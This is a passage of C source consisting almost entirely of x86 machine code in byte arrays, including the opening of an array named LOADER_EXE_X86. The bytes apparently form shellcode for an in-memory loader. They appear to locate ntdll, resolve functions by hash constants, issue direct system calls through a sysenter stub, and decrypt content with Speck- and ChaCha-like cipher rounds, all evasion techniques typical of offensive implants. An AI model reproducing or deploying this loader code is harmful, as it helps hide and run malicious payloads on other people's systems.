1861 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0xc4, 0x8b, 0x00, 0x0d,
1862 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x19, 0x8b,
1863 0x45, 0xc4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20, 0x20, 0x20, 0x20,
1864 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x1e, 0xeb, 0x04, 0x90, 0xeb, 0x01,
1865 0x90, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf0,
1866 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xeb,
1867 0x01, 0x90, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1868 0x00, 0xe9, 0x03, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18,
1869 0x89, 0x45, 0xec, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0xf4,
1870 0x01, 0xd0, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x20, 0x8b,
1871 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b, 0x45, 0xf8, 0x8b, 0x50,
1872 0x24, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0xc7, 0x45, 0xe8,
1873 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1874 0xb4, 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85,
1875 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xbc, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1876 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x0f, 0xb7,
1877 0x00, 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x60, 0x8b, 0x45, 0xe8, 0x8d, 0x14,
1878 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x8d, 0x1c, 0x02, 0x8b,
1879 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0x32, 0xfe, 0xff, 0xff, 0x89, 0x03,
1880 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
1881 0x45, 0xb8, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
1882 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x01, 0xd0, 0x8b, 0x55,
1883 0xe8, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01,
1884 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe8, 0x01, 0x81, 0x7d,
1885 0xe8, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d, 0xec, 0x01, 0x83,
1886 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x68, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90,
1887 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe8, 0x89, 0x10, 0xc7, 0x45, 0xe4, 0x00,
1888 0x00, 0x00, 0x00, 0xe9, 0xfb, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe0, 0x00,
1889 0x00, 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d,
1890 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b,
1891 0x50, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x0c, 0xc5, 0x00,
1892 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
1893 0xc2, 0x0f, 0x86, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d, 0x14,
1894 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x00,
1895 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xe0, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1896 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x45, 0xa4,
1897 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1898 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c, 0xd5,
1899 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x00, 0x89,
1900 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00,
1901 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c,
1902 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x40,
1903 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14,
1904 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45,
1905 0xa0, 0x89, 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5,
1906 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45, 0xa4,
1907 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1908 0x2b, 0x45, 0xe4, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe0, 0x0f, 0x82, 0x15,
1909 0xff, 0xff, 0xff, 0x83, 0x45, 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1910 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe4, 0x0f, 0x82, 0xf4, 0xfe, 0xff, 0xff,
1911 0xb8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1912 0xe5, 0x83, 0xec, 0x14, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0xff,
1913 0xff, 0xff, 0xff, 0xeb, 0x46, 0x8b, 0x45, 0x0c, 0x89, 0x04, 0x24, 0xe8,
1914 0xe2, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff, 0xff, 0xff,
1915 0xff, 0xeb, 0x30, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18,
1916 0x8b, 0x45, 0x0c, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0, 0x04, 0x39, 0x45,
1917 0x08, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x13, 0x83, 0x45, 0xfc, 0x01,
1918 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x39, 0x45, 0xfc, 0x72, 0xde, 0xb8, 0xff,
1919 0xff, 0xff, 0xff, 0xc9, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x50, 0x68, 0x27,
1920 0x6e, 0x95, 0x32, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1921 0x66, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x2c,
1922 0x50, 0x68, 0x0d, 0x22, 0x5e, 0x03, 0xe8, 0x7b, 0xff, 0xff, 0xff, 0x83,
1923 0xc4, 0x08, 0xe8, 0x4b, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1924 0x44, 0x24, 0x0c, 0x50, 0x68, 0x42, 0xb8, 0xce, 0x9a, 0xe8, 0x60, 0xff,
1925 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x30, 0x01, 0x00, 0x00, 0xc3, 0x90,
1926 0x0f, 0x0b, 0x8b, 0x84, 0x24, 0xc1, 0x00, 0x00, 0x00, 0x50, 0x68, 0x53,
1927 0x91, 0x98, 0xf2, 0xe8, 0x42, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1928 0x12, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x08,
1929 0x50, 0x68, 0xd1, 0xd6, 0x9d, 0x34, 0xe8, 0x27, 0xff, 0xff, 0xff, 0x83,
1930 0xc4, 0x08, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1931 0x44, 0x24, 0x10, 0x50, 0x68, 0x23, 0xe1, 0xbd, 0xe3, 0xe8, 0x0c, 0xff,
1932 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x90,
1933 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x18, 0x50, 0x68, 0x17, 0x15, 0x91, 0x0b,
1934 0xe8, 0xf1, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xc1, 0x00, 0x00,
1935 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x68, 0x15,
1936 0x42, 0xb7, 0x1c, 0xe8, 0xd6, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1937 0xa6, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c,
1938 0x50, 0x68, 0x4b, 0x47, 0xa5, 0x31, 0xe8, 0xbb, 0xfe, 0xff, 0xff, 0x83,
1939 0xc4, 0x08, 0xe8, 0x8b, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1940 0x44, 0x24, 0x14, 0x50, 0x68, 0xef, 0x7f, 0x90, 0x87, 0xe8, 0xa0, 0xfe,
1941 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x70, 0x00, 0x00, 0x00, 0xc3, 0x90,
1942 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30, 0x50, 0x68, 0x2a, 0xfe, 0x9d, 0x24,
1943 0xe8, 0x85, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x55, 0x00, 0x00,
1944 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x39,
1945 0x2b, 0xcf, 0x55, 0xe8, 0x6a, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1946 0x3a, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30,
1947 0x50, 0x68, 0x93, 0x76, 0x29, 0x34, 0xe8, 0x4f, 0xfe, 0xff, 0xff, 0x83,
1948 0xc4, 0x08, 0xe8, 0x1f, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1949 0x44, 0x24, 0x10, 0x50, 0x68, 0xf7, 0xc9, 0xac, 0xff, 0xe8, 0x34, 0xfe,
1950 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xc3, 0x90,
1951 0x0f, 0x0b, 0x89, 0xe2, 0x0f, 0x34, 0xc3, 0x90, 0x0f, 0x0b, 0x90, 0x90,
1952 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xd8,
1953 0x8b, 0x45, 0x10, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xd8, 0x8b, 0x55, 0xdc,
1954 0x89, 0x45, 0xe0, 0x89, 0x55, 0xe4, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
1955 0x00, 0xeb, 0x1c, 0x8b, 0x45, 0xfc, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1956 0x00, 0x8b, 0x45, 0x08, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x89,
1957 0x54, 0x85, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
1958 0xde, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b, 0x45,
1959 0xe0, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe4, 0x01, 0xc2, 0x8b,
1960 0x45, 0xe8, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0xc1, 0xc0,
1961 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xe4, 0x8b,
1962 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xec, 0xc1, 0xc8, 0x08, 0x89,
1963 0xc2, 0x8b, 0x45, 0xe8, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45, 0xf4,
1964 0x8b, 0x45, 0xe8, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xf4, 0x31,
1965 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xec, 0x8b, 0x45,
1966 0xf8, 0x89, 0x45, 0xf0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x1a,
1967 0x76, 0x9c, 0x8b, 0x45, 0xe0, 0x8b, 0x55, 0xe4, 0xc9, 0xc3, 0x55, 0x89,
1968 0xe5, 0x57, 0x56, 0x83, 0xec, 0x50, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xc0,
1969 0x8b, 0x45, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xe0,
1970 0x8b, 0x45, 0xc0, 0x8b, 0x55, 0xc4, 0x89, 0x45, 0xf0, 0x89, 0x55, 0xf4,
1971 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00,
1972 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0f, 0x01,
1973 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
1974 0x00, 0x84, 0xc0, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x40, 0x0f, 0x85, 0x95,
1975 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xe8, 0x89,
1976 0xc2, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x89, 0x54, 0x24,
1977 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24,
1978 0xe8, 0xab, 0xf7, 0xff, 0xff, 0x8d, 0x55, 0xd0, 0x8b, 0x45, 0xe8, 0x01,
1979 0xd0, 0xc6, 0x00, 0x80, 0x83, 0x7d, 0xe8, 0x0b, 0x76, 0x48, 0x8b, 0x45,
1980 0xf0, 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08,
1981 0x8d, 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x99, 0xfe, 0xff, 0xff, 0x89,
1982 0xc1, 0x33, 0x4d, 0xf0, 0x89, 0xce, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1983 0xc7, 0x89, 0x75, 0xf0, 0x89, 0x7d, 0xf4, 0xc7, 0x44, 0x24, 0x08, 0x10,
1984 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d,
1985 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xf7, 0xff, 0xff, 0x8b, 0x45,
1986 0xec, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xe8, 0x10, 0x00,
1987 0x00, 0x00, 0x83, 0x45, 0xe4, 0x01, 0xeb, 0x1f, 0x8b, 0x55, 0xe0, 0x8b,
1988 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8d, 0x4d, 0xd0,
1989 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xe8, 0x01, 0x83,
1990 0x45, 0xec, 0x01, 0x83, 0x7d, 0xe8, 0x10, 0x75, 0x3c, 0x8b, 0x45, 0xf0,
1991 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d,
1992 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x16, 0xfe, 0xff, 0xff, 0x89, 0xc1,
1993 0x33, 0x4d, 0xf0, 0x89, 0x4d, 0xb8, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1994 0x45, 0xbc, 0x8b, 0x45, 0xb8, 0x8b, 0x55, 0xbc, 0x89, 0x45, 0xf0, 0x89,
1995 0x55, 0xf4, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe4,
1996 0x00, 0x0f, 0x84, 0xe7, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x8b, 0x55,
1997 0xf4, 0x83, 0xc4, 0x50, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53,
1998 0x83, 0xec, 0x10, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08,
1999 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39,
2000 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
2001 0xf4, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00,
2002 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
2003 0xf8, 0x8d, 0x1c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01,
2004 0xd8, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8,
2005 0x03, 0x76, 0xc1, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xee,
2006 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83,
2007 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x89, 0x10, 0x8b,
2008 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1,
2009 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31,
2010 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b,
2011 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2012 0x08, 0x01, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b,
2013 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08,
2014 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10,
2015 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b, 0x45, 0xf4, 0x83,
2016 0xc0, 0x04, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x01, 0xca,
2017 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2,
2018 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45,
2019 0xf4, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1,
2020 0xc0, 0x0d, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4,
2021 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2022 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83,
2023 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31, 0xca,
2024 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45,
2025 0xf4, 0x83, 0xc0, 0x08, 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xf8,
2026 0x01, 0x83, 0x7d, 0xf8, 0x0f, 0x0f, 0x86, 0x08, 0xff, 0xff, 0xff, 0xc7,
2027 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39, 0x8b, 0x45, 0xf8, 0x8d,
2028 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x8b,
2029 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
2030 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x85,
2031 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31, 0xca, 0x89,
2032 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x03, 0x76, 0xc1, 0x90,
2033 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
2034 0x28, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x0c, 0x89, 0x45,
2035 0xf0, 0xe9, 0xbd, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00,
2036 0x00, 0xeb, 0x19, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f,
2037 0xb6, 0x00, 0x8d, 0x4d, 0xdc, 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02,
2038 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe1, 0x8d, 0x45,
2039 0xdc, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
2040 0x00, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0x14, 0xba, 0x10, 0x00, 0x00, 0x00,
2041 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf4, 0x00,
2042 0x00, 0x00, 0x00, 0xeb, 0x26, 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf4, 0x01,
2043 0xd0, 0x0f, 0xb6, 0x08, 0x8d, 0x55, 0xdc, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
2044 0x0f, 0xb6, 0x10, 0x8b, 0x5d, 0xf8, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31,
2045 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45,
2046 0xec, 0x72, 0xd2, 0x8b, 0x45, 0xec, 0x29, 0x45, 0x14, 0x8b, 0x45, 0xec,
2047 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x20,
2048 0x8b, 0x45, 0xf4, 0x8d, 0x50, 0xff, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x0f,
2049 0xb6, 0x10, 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
2050 0x74, 0x02, 0xeb, 0x0b, 0x83, 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85,
2051 0xc0, 0x7f, 0xd9, 0x83, 0x7d, 0x14, 0x00, 0x0f, 0x85, 0x39, 0xff, 0xff,
2052 0xff, 0x90, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0xff, 0xff, 0xff, 0xff,
2053 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00};
2054
0
1 unsigned char LOADER_EXE_X86[] = {
2 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec, 0x10, 0x03, 0x00, 0x00, 0xc7,
3 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c,
4 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x83,
5 0xf6, 0x00, 0x89, 0xf1, 0x89, 0xd0, 0x80, 0xf4, 0x00, 0x89, 0xc3, 0x89,
6 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x8b,
7 0x45, 0x08, 0x8b, 0x50, 0x74, 0x8b, 0x40, 0x70, 0x89, 0x45, 0xe8, 0x89,
8 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89,
9 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55,
10 0xec, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08,
11 0x89, 0x04, 0x24, 0xe8, 0xb2, 0x11, 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83,
12 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0x98, 0x00, 0x00, 0x00, 0xe8, 0x8e, 0x50,
13 0x00, 0x00, 0xba, 0xa4, 0x11, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
14 0x29, 0xca, 0x01, 0xd0, 0x89, 0xc2, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
15 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
16 0x08, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
17 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
18 0x8b, 0x45, 0xe4, 0xff, 0xd0, 0x83, 0xec, 0x18, 0x89, 0x45, 0xf4, 0x8b,
19 0x45, 0x08, 0x8b, 0x90, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00,
20 0x00, 0x00, 0x89, 0x45, 0xe8, 0x89, 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b,
21 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24,
22 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x89, 0x44, 0x24, 0x04, 0x89,
23 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1c, 0x11,
24 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xdc, 0x00, 0x0f, 0x84, 0x83,
25 0x00, 0x00, 0x00, 0xeb, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x7d,
26 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x74, 0x83, 0x7d, 0xe0, 0x00, 0x74, 0x6e,
27 0xc7, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x07, 0x00, 0x01, 0x00, 0x8b, 0x45,
28 0xe0, 0xff, 0xd0, 0x8d, 0x95, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
29 0x04, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xd8, 0xff, 0xd0, 0x83, 0xec, 0x08,
